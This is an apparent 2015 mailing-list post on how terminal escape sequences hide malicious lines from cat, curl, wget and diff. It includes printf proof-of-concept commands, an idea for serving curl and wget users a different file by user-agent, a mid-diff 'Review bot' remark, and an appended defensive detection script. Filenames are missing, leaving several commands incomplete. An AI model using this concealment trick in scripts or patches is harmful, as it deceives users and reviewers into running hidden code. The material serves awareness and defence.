Date: Thu, 17 Sep 2015 18:03:19 +0200
Subject: s/party/hack like it's 1999

Federico Bento <>

So recently I've encountered a post by Kurt Seifried of Red Hat on the
oss-sec mailing list entitled "Terminal escape sequences - the new
XSS for admins?"

The title is a little misleading, since escape sequences were
introduced circa the '70s, so they're actually not that new.

How it technically works:
A terminal escape sequence is a special sequence of characters that is
printed like any other text. If the terminal understands the sequence,
it doesn't display the characters; it performs some action instead.

While some people might already know what I'm going to present, I
believe the majority doesn't, so this is mostly to raise awareness.

$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' >
$ chmod +x
$ cat
echo doing something very nice!
$ ./
doing something evil!

As you can see, our beloved 'cat' cheated on us. Why?
Because instead of being displayed, the escape sequence \033[XA (X being
the number of lines) performed an action: it moves the cursor up X
lines, so whatever is printed next overwrites what was already there.
But this doesn't affect only 'cat'; it affects everything that prints to
a terminal that interprets escape sequences.

$ head
echo doing something very nice!

$ tail
echo doing something very nice!

$ more
echo doing something very nice!

It's not over yet!

$ curl
echo doing something very nice!

$ wget -qO -
echo doing something very nice!

But if we pipe it into a shell...

$ curl -s|sh
doing something evil!

$ wget -qO -|sh
doing something evil!

You might be thinking "If I opened that in my browser, I would detect
it being malicious!"
Well, think again...
One can have all sorts of fun with user-agents. Something that easily
comes to mind is checking whether the user-agent is curl or wget and
serving them the malicious file, and otherwise redirecting to a
legitimate file that looks like the original output. Your browser would
fool you then.

I wouldn't even be surprised if most of those install scripts that
make use of this 'pipe into sh' bullcrap abused this.
I wouldn't even be surprised if most of you were already pwned by
escape sequences in some situation or other.
Imagine the possibilities, from hidden SSH keys in your
authorized_keys to options hidden in your configuration files...
It's no secret that most of us rely on 'cat' to view files. I guess this
is one black kitty, giving you bad luck.

Here's another example with a .c file

$ printf '#include <stdio.h>\n\nint main()\n{\n\tprintf("doing something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do much... */\n\tprintf("doing something very nice\\n");\n\treturn 0;\n}\n' > nice.c
$ cat nice.c
#include <stdio.h>

int main()
	/* This simple program doesnt do much... */
	printf("doing something very nice\n");
	return 0;
$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice

'diff' is affected by escape sequences too, and so are the resulting patches.

Going back to the first example, imagine I have a that
is backdoored, and a that does what its output tells us.

$ cat #evil file
echo doing something very nice!

$ cat #actually echoes doing something very nice!
echo doing something very nice!

$ diff -Naur
---	2015-09-17 16:25:42.985349535 +0100
+++	2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
-echo doing something very nice!
+echo doing something very nice!
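Review bot: the -/+ pair at the end of this hunk is visibly identical, and the header @@ -1,4 +1,2 @@ promises four old-file lines and two new-file lines while only one of each is shown; both are tells that the removed lines carry non-printing bytes the terminal has already interpreted. Before applying a patch whose hunks look like this, inspect it with `cat -v` or `less` (without -r), where the raw \033[2A shows up as ^[[2A.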

$ diff -Naur > file.patch
$ patch -R file.patch
$ chmod +x
$ ./
doing something evil!

'less' doesn't interpret escape sequences unless the -r switch is used,
so stop aliasing it to 'less -r' just because there's no colored output.

s/party/hack like it's 1999
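As an added example (not part of Federico's post), here is a POSIX shell script that rebuilds the cursor-up trick from the first example in a throwaway directory, reveals the hidden bytes with cat -v, and refuses to execute any script (or patch) that contains ESC, CR, backspace or 8-bit CSI bytes. The helper names control_bytes and safe_run, the temp directory and the sample files are this example's own.

```shell
#!/bin/sh
# Added example: detect terminal escape sequences in a file before
# trusting what 'cat' showed you. Helper names (control_bytes, safe_run)
# and the sample files are this example's own, not from the post.

# Count bytes that let text rewrite what is already on the screen:
# ESC (\033, starts CSI/ANSI sequences), CR (\r, returns to column 0),
# BS (\010, steps back one column) and the 8-bit CSI byte (\233).
# LC_ALL=C makes tr work on raw bytes so UTF-8 text is not flagged.
control_bytes() {
    LC_ALL=C tr -cd '\033\r\010\233' < "$1" | wc -c | tr -d ' '
}

# Run a script with sh only if it contains none of those bytes.
# Returns 2 (and prints a hint on stderr) when it refuses.
safe_run() {
    _n=$(control_bytes "$1")
    if [ "$_n" -ne 0 ]; then
        echo "refusing to run $1: $_n control byte(s); inspect with: cat -v $1" >&2
        return 2
    fi
    sh "$1"
}

# --- demo on constructed files (same trick as the post, in a temp dir) ---
tmpdir=$(mktemp -d)
trap 'rm -rf "$tmpdir"' EXIT

evil="$tmpdir/nice.sh"
printf '#!/bin/sh\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' > "$evil"

clean="$tmpdir/clean.sh"
printf '#!/bin/sh\necho doing something very nice!\n' > "$clean"

echo "--- cat -v shows ESC as ^[ so the cursor-up sequence can no longer hide:"
cat -v "$evil"

echo "--- control bytes: evil=$(control_bytes "$evil") clean=$(control_bytes "$clean")"

echo "--- safe_run on the constructed evil file:"
safe_run "$evil"; rc=$?
echo "exit status $rc"

echo "--- safe_run on the clean file:"
safe_run "$clean"; rc=$?
echo "exit status $rc"
```

The same control_bytes check works on a downloaded patch before handing it to patch, and on anything fetched with curl or wget before it goes anywhere near sh; the byte list is deliberately short so UTF-8 text passes, so extend it if your threat model includes other C0 controls.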

